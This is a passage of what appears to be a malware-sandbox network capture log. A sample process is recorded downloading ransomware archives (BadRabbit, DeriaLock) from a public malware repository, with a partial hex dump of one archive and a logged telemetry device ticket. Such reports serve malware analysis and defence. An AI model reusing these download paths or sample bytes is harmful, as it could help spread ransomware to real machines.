                                                                                                                                                    2022-09-29 13:01:30 UTC39313INData Raw: d0 c8 6f b8 bd af f1 df 66 87 9a 7e fd b6 77 ca 44 32 b6 e7 9c 56 4c 9b 1d c9 17 fe c2 fb 3f 48 22 03 9e 02 2a 47 c7 30 bb 3e 6b 9c fd 3c b1 6f fd fc 13 d0 41 9f 51 54 c9 79 e0 45 0c 28 b0 f0 50 47 36 0c 16 93 29 66 33 6d 8d a9 b6 aa df 0c 0e 61 e1 f3 e4 8a 0a e7 ea 6d f3 f8 52 92 1a a7 0a d1 18 7e d5 9c b6 f9 7a 06 75 e2 58 84 0a f2 f5 48 e1 5e 20 9e a7 75 9a f3 63 3a c4 a0 83 20 05 0f d1 7d a6 12 4f ce ac b3 18 6f 47 47 38 38 6a 53 73 91 8f 00 16 a3 b4 c7 db 95 28 a2 ad 71 fd 54 f2 1b 26 6d 45 4f 74 38 73 60 21 c8 00 2e 82 63 52 20 cc be e4 d4 29 92 81 e0 4f 0b 14 08 ff 0a 8d 9c 95 d0 a9 6a 16 7e c7 af 5d 04 84 cd 1d 58 a6 73 66 04 d9 b4 86 6a b5 9a 9b 7b 9a d3 a7 b0 c3 a9 87 1e 2c 2d bb 2d 39 47 fc 3b bc ef 66 79 6e 61 c8 e9 bc 6e 00 a4 8f 1b e2 2f 42
                                                                                                                                                    Data Ascii: of~wD2VL?H"*G0>k<oAQTyE(PG6)f3mamR~zuXH^ uc: }OoGG88jSs(qT&mEOt8s`!.cR )Oj~]Xsfj{,--9G;fynan/B
                                                                                                                                                    2022-09-29 13:01:30 UTC39329INData Raw: 20 6a 5b d3 14 76 ba 3f 41 47 9d 45 4c 14 86 7f 02 77 7c cc 51 e0 d7 e5 e7 2e 84 cb 39 19 06 7c 42 86 72 5b ca 4b 79 da d8 2d 2d 85 30 67 06 0e 90 0f d5 4e 42 7c 12 06 27 c2 ed bf 55 ae 7a 51 d6 de bf c9 8e b0 95 7b 59 e8 89 01 d2 8c 75 a3 5d 10 ef 63 8a 63 35 da d3 67 85 21 36 3b 66 29 1d 4c 10 85 c9 7d f9 82 ab 23 91 91 44 da 54 2e cd e2 33 c0 57 6d 7f 44 ec 53 1c ad f8 ac 94 33 5b 2b 1f b8 70 44 57 2a fb 76 ea f7 39 ff 45 e9 71 4e 8e 6f 21 a0 95 9d d5 e6 26 91 4a 6f d5 06 78 99 d7 ec b5 53 b6 28 64 0b 5b 18 9c 7a a1 f8 0c b6 fc dd 19 49 48 dd cf 4f da 37 ad ba 0a 2c 8e 62 cb 0a fe 92 2d f0 41 be d9 ef 63 8f 42 d3 a5 1c 5d 95 9b 60 3a ea dc d4 ec f6 1b 8b e4 0d 31 e3 35 fb 29 cc 7a 9d 0a 61 b7 e9 79 a4 a2 ed 88 f4 82 a3 5e ed 7c 9b 15 cb f9 bc 8f 43 12
                                                                                                                                                    Data Ascii: j[v?AGELw|Q.9|Br[Ky--0gNB|'UzQ{Yu]cc5g!6;f)L}#DT.3WmDS3[+pDW*v9EqNo!&JoxS(d[zIHO7,b-AcB]`:15)zay^|C
                                                                                                                                                    2022-09-29 13:01:30 UTC39345INData Raw: f5 19 bb 37 94 5b bd a3 c7 eb 87 c0 8f ea 5e bb ec 1b 24 80 9b aa 2a 29 a6 84 88 16 72 c1 80 26 ae e4 0f e2 b0 1a a8 9b 8e 99 6c f5 2b bd 32 e8 a5 df 06 0b cd f6 7a 8b b8 ee 42 3c 3b d2 d1 f8 8a df 34 14 77 3b 39 9d f5 d1 44 7b bb 1f 46 ca 6b c0 7a 8c e6 dc 7f 4f ad 27 93 49 1d 69 51 47 ab 20 e4 e5 e1 b2 49 70 7a a1 60 24 83 fc c5 69 03 e5 cc 69 dd 0a 8c c3 e5 55 53 f0 e7 1c eb c6 5b 27 90 17 87 a5 1e a8 9e 68 81 b1 6e 18 46 d4 2b bd de f1 97 28 bd ce af 3b e0 28 05 30 2b dc ba 10 93 e6 f6 a2 16 a5 76 72 70 98 35 e6 bd a2 ad c6 b0 eb 75 12 26 0f c0 ee 40 63 1a 6b 57 a7 31 4b 82 3d 90 f4 05 04 9e c9 26 39 8c a6 dd f2 ba 10 cc 02 9b 78 ca d2 ec 9b be dd b0 e4 2f e1 8f 42 f4 82 af 1f a3 0f e7 50 f9 a4 1d ef 06 2d 5a b0 54 9a 75 14 07 f2 a9 67 aa 2f 6a a3 5c
                                                                                                                                                    Data Ascii: 7[^$*)r&l+2zB<;4w;9D{FkzO'IiQG Ipz`$iiUS['hnF+(;(0+vrp5u&@ckW1K=&9x/BP-ZTug/j\
                                                                                                                                                    2022-09-29 13:01:30 UTC39361INData Raw: ca ea a1 2d 75 b0 19 3c 8c 4a 3c 06 10 11 06 e6 6a 3f 60 30 70 fb e5 ea 53 4c fc c1 a5 3f a3 33 f0 28 8d 3b 4b 89 5f ef 3e d9 b8 1c be 97 1e e8 f2 ab 7f 61 3d 43 0d 92 0e 5f 40 82 ff e7 e6 84 33 b4 d5 83 09 0e 48 79 33 fe 51 aa 08 fe fe 06 15 89 e0 7c 75 ed fe 99 5b 81 1c 81 95 f0 2d 6b a8 1f ff 71 f3 94 b7 1a cf e9 82 85 5b 24 e9 ed 9e dd f1 38 ec 79 e1 7f 73 ef 3e 8f 71 a9 06 84 53 ed 21 8f 81 45 62 45 38 2a b5 cf 98 23 54 6a 3a c2 f4 dd 6b 22 78 ec ec d9 d8 4d 9a 59 13 0d 57 e9 3c a1 39 fe 92 ad 58 98 18 0e 55 f1 86 28 31 a2 6e 3c bb 90 7e 8e 14 7f d3 8c 78 43 00 20 fe 05 40 bc 01 63 6b e8 32 6f 52 4b 19 d0 ab 3c a2 8c b5 b9 19 12 e8 4f 06 fe 5c 60 9c f8 1b 26 d5 65 b0 40 14 ea a7 b9 7c e4 ab 07 e8 b1 76 03 02 5f e8 48 d1 84 c4 96 d8 8d 8f c2 11 03 75
                                                                                                                                                    Data Ascii: -u<J<j?`0pSL?3(;K_>a=C_@3Hy3Q|u[-kq[$8ys>qS!EbE8*#Tj:k"xMYW<9XU(1n<~xC @ck2oRK<O\`&e@|v_Hu
                                                                                                                                                    2022-09-29 13:01:30 UTC39377INData Raw: 52 17 55 a4 43 09 06 7e 3a 7d 82 ce d4 05 34 23 ce d1 67 77 09 83 09 76 6c a7 9d c7 3f 21 dd 00 cf 5f 2e b6 ec aa d6 b9 bb 0f 02 b0 54 26 dd 89 7d 73 63 b0 8f 44 24 e4 06 d2 cd f6 ec 34 a9 9e a2 64 b1 5e 6c 4a 9e da f4 82 e1 94 db 6b e6 c3 2e 82 73 0d a4 6e cb bd 11 65 1f 68 e3 91 db 2e 0f 7e 3a 8d a0 9c 07 d7 4e 7a 9f 64 da 58 02 84 b1 73 b9 f3 e7 88 44 65 a5 05 24 5c 30 08 54 f8 38 04 2a 7b e3 6f fb 2e 5a 85 46 5a 2f a7 40 d1 5b d2 58 ca 63 65 52 75 ec 09 70 4d 81 82 19 82 ec 63 23 31 18 d1 03 4a 1b d9 f8 da 13 8d 0e 2c 14 17 e0 2d a2 ba 46 83 0c 16 b4 6a 42 16 67 fc d5 d4 51 9d 8b cd 52 ad 17 e0 47 58 e2 c0 96 63 bf 04 6b 77 60 09 c6 1c d4 43 6e 5e 35 bd df 52 60 6d 6a 4d a6 96 b4 da a2 8a 08 50 b7 ba 75 f9 70 37 87 4b 59 d1 ea 6d 97 ad 89 bf 61 d7 99
                                                                                                                                                    Data Ascii: RUC~:}4#gwvl?!_.T&}scD$4d^lJk.sneh.~:NzdXsDe$\0T8*{o.ZFZ/@[XceRupMc#1J,-FjBgQRGXckw`Cn^5R`mjMPup7KYma
                                                                                                                                                    2022-09-29 13:01:30 UTC39393INData Raw: 06 4e 72 bf f8 5c a6 65 95 70 02 af 5c 43 bb 5a df ad 63 6f 11 0e 88 d3 f3 84 e9 d0 8e 87 ed ad a4 7b 49 b5 74 1b dc fa c4 3a ab 2b b1 53 6d 8c 66 31 0a 9d 54 d9 2a 9c 03 71 eb d5 1c dc e9 1b 4e 7b 83 70 60 ef 3f 31 db 49 cc 6a 16 ca 3b fe 43 d5 b1 0a 58 12 45 cd af 39 53 1d 4e fe 11 53 a5 35 4a fe 62 ff 80 e2 91 21 98 c4 6f 81 52 32 70 fd eb b7 73 cf ff a4 02 9e 75 d2 dc 9a a1 f1 ee d5 1d ce f8 c7 2f 2c 4c 1b c3 d1 39 c9 cc 29 bb 7a 70 89 cd e6 42 4a d3 05 2a b0 f3 30 03 63 93 f2 5e 1e 07 4f 13 83 33 4c 1f 09 7e fb c6 92 e3 36 7c 8b 46 f8 e7 4f 06 c4 c4 f7 be af 18 4c 9b ff b1 a3 f7 20 59 85 cd 87 5b fb 3e 50 23 e5 bd bf 21 d4 d4 f5 7f e0 d2 4f a5 f0 29 f0 d1 05 a0 d2 14 89 a2 f6 d0 36 22 94 54 f6 13 6f 03 7d 0c 83 cd c4 3b 22 dd 4d 61 61 d7 f6 c8 a6 ac
                                                                                                                                                    Data Ascii: Nr\ep\CZco{It:+Smf1T*qN{p`?1Ij;CXE9SNS5Jb!oR2psu/,L9)zpBJ*0c^O3L~6|FOL Y[>P#!O)6"To};"Maa
                                                                                                                                                    2022-09-29 13:01:30 UTC39409INData Raw: e5 ab bf f1 59 8c ea b7 bd 6a f1 b9 57 73 3f b0 b8 e7 8d df 46 47 a3 cd 0e b2 7b ca d9 87 a0 db e2 d0 cb 92 38 cf 69 5e 59 39 8f 9c 3b 24 df 75 26 7a b8 4b 96 f5 c6 65 bb 71 ad ea b4 6b 0b 7f 45 10 b5 46 52 d2 e4 3c 36 c7 6c 28 c1 40 29 7e 89 ee 56 39 57 20 4a df 30 bc 7b df ac 37 66 73 19 63 69 f3 a6 f0 69 48 e5 73 a4 ea d8 79 62 48 24 c2 51 a7 4b cf f4 13 2b a0 6e 84 67 3b 91 ae 55 90 94 46 93 56 c7 d0 88 d0 18 6e 75 b7 b3 96 e3 43 09 4a f7 08 ac 74 63 b0 12 30 ec 3d 9d e4 62 d1 96 30 b8 69 22 48 1a 98 72 ac 90 59 a5 fb 86 2b a7 41 b2 6b 56 af 38 f7 31 2a ce 31 e2 05 a4 dc 01 d4 49 0d 0b 20 d0 00 99 f9 7b 0e f0 a5 80 11 84 ad 92 79 5e 38 9f 8b fb dc a4 77 f2 52 8c c8 c3 ff 1a 74 80 72 47 ff cf e6 a8 c5 e6 83 55 74 6e 40 e5 91 e1 a0 78 18 f9 73 2d 7e 08
                                                                                                                                                    Data Ascii: YjWs?FG{8i^Y9;$u&zKeqkEFR<6l(@)~V9W J0{7fsciiHsybH$QK+ng;UFVnuCJtc0=b0i"HrY+AkV81*1I {y^8wRtrGUtn@xs-~


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    169192.168.2.349939140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:07 UTC39410OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                    Host: github.com
                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    17192.168.2.349716140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:58:53 UTC887OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    170140.82.121.3443192.168.2.349939C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:07 UTC39410INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:02:07 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 13:02:07 UTC39411INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    171192.168.2.34993520.189.173.21443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:07 UTC39413OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: MSDW
                                                                                                                                                    MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAQyg68hNd+pS9Cokwe9Vycw1xUmHLVSWEzL3ILk4ELKDB0EcA/Y5BMquB/Vr4wAzUg5izvEikn5Ygt0TdscvgTm/QeZEM03mTZb3cKyj6JF1AwIm0XjNFKOEJ2wiwyfJL3u7TQr3sGIFa48jJehodEV4DgGnOT77rplQNF9nix+Q67MOQO6E+nA91CE/gq12KW+C9IQOkWidi/EdkAgDryv6RYqXkuZmfl7p0kuXn6c8t2nK8sCAsMLbv7BXw4x2MOoR8EO97cdJHi/VZzqzuClMiFxYHJtSRtliL372+qEBnsU+EnPOOrL/z/ZiHPENFKIkRPbb/8l6KkMvLzfeI2cDZgAACNOqKCTKkDaTiAEAiCbHfOZdk37ebs4z9YlWK0ggABm5rlJR8mqKoukm5s59WGiTEsqaTsEqSuTQyAMtNdco9DDEAvt4+UMabUuNVDEWqzFfrHVrSdvQYjsDapDi7Pbjmu7yRtHNbrcghaauEFGvYmKB1OojJfqVlDlWn/kqifa1Q4NFlFw6WHgVAEgJlDC8ClLbpH9UlTeh3+xKs97H8FWS5YOaaMhWsjgMoBKupsWUsYgnaK0nOm640mhdaqhVns4fhXbe15xBWB1dmuDf692q8AqeBxx7Gj3D2e5z4hCLVGBWOzS+dlAggdr7HR/xo6TZoa1w0Uy+ha3Kc7+iHfFWH8U1SdI3ZiUzpvWZRT9p9Le/WWEhKvVrrHDYHWsUyVV94CvHzB2L6bfeAfFQJQE5yXQCxMvx6MbguJX2Yp84PBovQJfaNqSXR32KdTi12J/iQd2uTgVk0y6lvTSKrxN08DBFWr9qfPWF7wM89QXseKP8nHDXjPEjgimbyp8FAH0QrqADB29FmuasrPKg//o80bgB&p=
                                                                                                                                                    Content-Length: 4770
                                                                                                                                                    Host: watson.telemetry.microsoft.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    172192.168.2.349941185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:07 UTC39414OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    173185.199.108.133443192.168.2.349941C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:02:07 UTC39414INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 402632
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 5618:1220:101AF1B:11175EB:63359687
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:02:07 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6922-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456528.955035,VS0,VE1
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 28672c6aa9e33f6641adc2fff2cf25b8b31676b7
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:07:07 GMT
                                                                                                                                                    Source-Age: 200
                                                                                                                                                    2022-09-29 13:02:07 UTC39415INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                    Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                    2022-09-29 13:02:07 UTC39431INData Raw: 72 c8 31 c2 9d f7 2e 41 53 ac c7 27 ce 6b c8 aa ef 81 64 8e b4 61 a3 68 c9 b2 4f 51 0f 0c d0 0b 4c 71 6f ed 6f 20 9a 1c 07 c1 6d 4b ad 82 2e 0c d8 76 e0 4e c7 34 dc 23 56 fe 18 59 7d 9d 34 7a 07 81 2e 22 f6 07 d6 af 92 93 9e 99 79 2c 0b b5 1d 5d 9f 43 60 6b 35 90 10 b0 c8 29 dc 00 bb 73 51 54 95 38 6c 8c 8f 1a 0c 72 e7 4d 5b b9 96 5b f8 d4 55 f8 09 c0 2a 6f 2d 76 fb 69 8d 7a f1 e9 d7 35 17 79 fe 2e 8d 55 4d c4 34 a7 1b 02 fe 6e da 8b 97 a7 6e 37 9d 8e cd ae 2b 76 01 4d 9e 15 87 c4 e4 66 02 e2 98 84 31 d0 d4 14 3d 69 e4 12 90 c3 81 a2 a1 71 8a 43 d3 5b c6 fb 0f 0a 40 50 0f e0 8e 4a 58 d9 62 7b 0b 99 1d df 17 a6 67 a8 30 f0 a7 69 b9 75 d6 77 57 ef e2 8b a1 25 9f 21 41 dd f6 20 66 52 70 20 57 c0 71 32 bf ee 40 86 cb d3 32 03 76 87 d4 20 f2 0c 0a 9e 32 dd 55
                                                                                                                                                    Data Ascii: r1.AS'kdahOQLqoo mK.vN4#VY}4z."y,]C`k5)sQT8lrM[[U*o-viz5y.UM4nn7+vMf1=iqC[@PJXb{g0iuwW%!A fRp Wq2@2v 2U
                                                                                                                                                    2022-09-29 13:02:07 UTC39447INData Raw: df 68 45 73 e0 48 d9 9a 68 44 7f cf 25 7e 2c f7 a7 f0 68 54 12 ed d0 2a 22 31 10 ac a1 e1 77 4c 42 a9 31 71 f8 97 16 75 01 a1 1e e1 e1 17 fe 10 23 57 f6 34 80 ff 56 f2 aa 8a 75 ce 91 d4 8c 17 b0 44 67 6d fb 81 09 a0 08 4a fe 24 1e 2f a0 22 14 da d0 bb eb 65 1c fe 98 44 82 fc 8d e5 aa 15 d7 39 42 ae ee c7 8d d4 a1 d4 02 21 3b 0b 24 38 c4 0b d7 38 98 f6 c4 fc a6 80 1d 85 23 73 a9 a9 15 94 27 53 8a 2e 99 55 5e d4 a2 78 66 8e 6d d4 f6 02 ed 7e 13 40 15 8b b9 82 b2 dd 13 fb f0 5b 1e 54 0f 2e 43 8b ca 26 60 fe a3 8e 21 1a fa df 98 d7 6a 59 63 d7 16 27 df f6 07 fe 81 80 1b f1 18 90 3b 3d 7f 64 eb 30 2b d7 59 85 a0 c7 bf 41 be d8 4a d4 0e bd 61 31 21 ea 8f c9 86 ad 0f 6b 39 52 a9 14 fd f1 7d 1f fc 66 70 5c b7 2a 1f d3 7d 54 f2 17 8e a5 98 7e 5b 75 54 c0 49 10 62
                                                                                                                                                    Data Ascii: hEsHhD%~,hT*"1wLB1qu#W4VuDgmJ$/"eD9B!;$88#s'S.U^xfm~@[T.C&`!jYc';=d0+YAJa1!k9R}fp\*}T~[uTIb
                                                                                                                                                    2022-09-29 13:02:07 UTC39463INData Raw: c3 a0 6b 5f 9d ce 11 cf 59 14 7f b2 aa 14 34 99 4d ce 0c a5 85 81 79 45 d1 74 4a 6f 00 aa e4 8c 0e 69 de 4e 90 e7 67 97 7d 3a d9 6b f2 d5 9a 38 fb 8f f7 c0 52 ae 61 47 33 08 16 e3 39 ee ee c8 96 3c 11 6c 39 ba 9a b8 7a 07 c4 d8 f2 f7 97 b1 15 17 ff a2 1a dd f1 7e 85 38 2f 9d e5 80 f3 9f b3 d8 5b 23 1b 2a 83 4b d6 52 de b1 99 e2 e9 f5 41 77 0e 1b 02 6f 18 79 c1 5a 06 84 21 c6 39 b2 28 51 0d e3 1a 6a 8a 22 b1 52 ba 7f a3 10 23 0f 18 f4 9b 7f 22 38 8a 2e 9b cb 3a b1 01 19 21 17 c9 ec 7d 6a a8 f1 4a 1b 2a a1 1f b8 83 72 e1 9b ef eb ae 43 20 62 15 6e 87 c4 84 92 cc 79 4c 84 fa b4 10 67 22 48 cd b7 58 d7 8a 11 c3 48 64 fd 1f f6 92 0a ce f6 1a 5f 92 30 a1 92 09 2d 29 75 d9 45 d3 73 d6 61 82 68 6f d7 f8 a1 50 01 d4 f6 b9 38 c0 2f 02 24 0f 42 83 46 db bc b6 e2 80
                                                                                                                                                    Data Ascii: k_Y4MyEtJoiNg}:k8RaG39<l9z~8/[#*KRAwoyZ!9(Qj"R#"8.:!}jJ*rC bnyLg"HXHd_0-)uEsahoP8/$BF
                                                                                                                                                    2022-09-29 13:02:07 UTC39479INData Raw: d3 e8 b3 a5 57 bb 0f 80 8e 4a d0 94 cd 31 b7 fc 52 9b dd ec 1d 0e df e2 b2 72 10 11 45 d0 13 e7 46 73 0e ee 88 25 59 a0 87 52 2a 7f f1 c9 04 38 b2 8a 86 e3 55 b0 df 6d 8e 1c 77 b0 01 ac 10 05 04 6b ae 2b 3b 5e bf 4a ed 73 d8 ab d3 cf fb a8 6e a2 bc 4f 41 2d c4 15 83 39 f0 dd 86 d1 ca 20 b5 c3 a8 59 39 4c 02 66 11 12 8e 3d b1 f1 60 78 f2 6b e1 ac 59 82 ea 00 59 c1 52 94 4e 15 f8 64 8a cb b7 a7 02 ac 35 7d a2 41 76 da e4 c6 75 30 50 5a d7 bc ec 8f b5 23 13 c9 ba fb ef 45 7f eb 5a e2 8f 23 36 26 7f 40 df 34 a3 e1 62 b2 12 aa ad e7 23 b5 ca 8b 71 b0 44 0a 27 af dd 1e 19 7d 21 dd be 40 7a 66 f1 99 77 2e 7c dc 11 fd 78 b3 18 30 1a e9 85 ba 8d ad 5b f5 01 38 d7 04 ee 9a 7d 9b 2d 3a 21 53 ff 71 58 63 ea e3 5d 5b aa d2 86 cf c9 f7 50 41 78 22 be a2 af af 77 21 ea
                                                                                                                                                    Data Ascii: WJ1RrEFs%YR*8Umwk+;^JsnOA-9 Y9Lf=`xkYYRNd5}Avu0PZ#EZ#6&@4b#qD'}!@zfw.|x0[8}-:!SqXc][PAx"w!
                                                                                                                                                    2022-09-29 13:02:07 UTC39495INData Raw: 9f 8c 81 5a e1 61 65 95 8f cc a2 6e e0 37 5b 40 bf cf de df 7f 30 4e c4 a4 a4 14 6c a5 a4 3e 3b 32 39 ff 30 2f c3 ed af 76 75 0a a1 44 6b d1 d5 e7 ce 30 e9 f3 b2 51 21 30 02 31 4a 3a f3 7d 4c 47 9f 37 81 61 20 f0 24 e0 40 e2 f4 11 69 06 c1 e5 da 68 f6 69 da f1 a8 6a f0 d5 a3 85 b1 b1 09 83 b7 cb 7a 5c 58 d7 9d 8e c4 83 37 08 26 88 ca 0b bd 39 13 32 c4 8f 4a 58 c4 bc bb b9 ec bb fd 1a 09 ac ed 3b 04 a3 46 1a ed 64 16 1a f8 bd ba 5e d2 6b cb 90 6c 03 35 4f 84 50 70 ad 4a d0 df 47 d5 45 6b af 9d d4 e0 9b 68 3f 90 45 96 04 05 49 ea 2d 74 67 09 3f f6 24 51 df 6c 99 ec c5 8c f6 9d 59 93 1f 24 5d 0c 81 bb 8a c2 bc 3b 5d 69 ba 18 5e f1 aa 37 5c a9 5b d7 6f 6c 1c ba 02 d0 af 63 c7 70 af 52 c8 45 95 ee 6b 4d 68 57 cc c4 33 db 39 a3 05 b7 b7 6e 10 0b 85 9f aa 69 12
                                                                                                                                                    Data Ascii: Zaen7[@0Nl>;290/vuDk0Q!01J:}LG7a $@ihijz\X7&92JX;Fd^kl5OPpJGEkh?EI-tg?$QlY$];]i^7\[olcpREkMhW39ni
                                                                                                                                                    2022-09-29 13:02:07 UTC39511INData Raw: 11 1b be 72 2a 9b ac 24 a6 6f d8 66 50 56 81 1f 92 36 08 2a 93 7a dd 7d 06 0e 44 95 94 0a 7e 98 74 6f fa db 94 31 1c c4 1f b4 1d 86 a4 a1 d1 e1 40 d4 9d ad 4b 7d 69 4c f8 2b 15 ac 29 1f c3 92 8c 8c c3 d5 39 a7 cb ce 0a 54 1b 9c 7a 06 85 95 e4 1f a6 6d 48 ba d3 e7 ec e4 f7 d9 e6 03 bf ea e1 48 7f fc 76 cd 8d e7 d5 6f 81 b0 40 29 89 24 11 52 7a c4 89 a8 dd ca 01 9b 14 cd 66 89 e5 5b 32 ef 55 90 2d 79 f7 ae 4f 50 2c 2d 9d da a7 a3 ee f8 e5 2e 08 2d 9f e0 7e 3e 38 67 38 30 2a 9c de 08 b3 ba aa 0d da 44 d4 22 04 bc 5f 6b 86 76 73 da 6a 0c 5c c5 7f 72 5e 25 dc 19 fa 32 9a 0d b2 94 07 a0 01 18 eb a7 77 02 48 54 66 d4 06 42 86 45 c6 28 97 b7 29 76 b6 e9 77 3d ec 66 42 ba bb 7d 87 b2 e0 b3 26 05 14 57 20 e7 ed 14 2e b6 0b 80 70 2b 3c d2 30 8d 0b 60 28 c3 23 b3 31
                                                                                                                                                    Data Ascii: r*$ofPV6*z}D~to1@K}iL+)9TzmHHvo@)$Rzf[2U-yOP,-.-~>8g80*D"_kvsj\r^%2wHTfBE()vw=fB}&W .p+<0`(#1
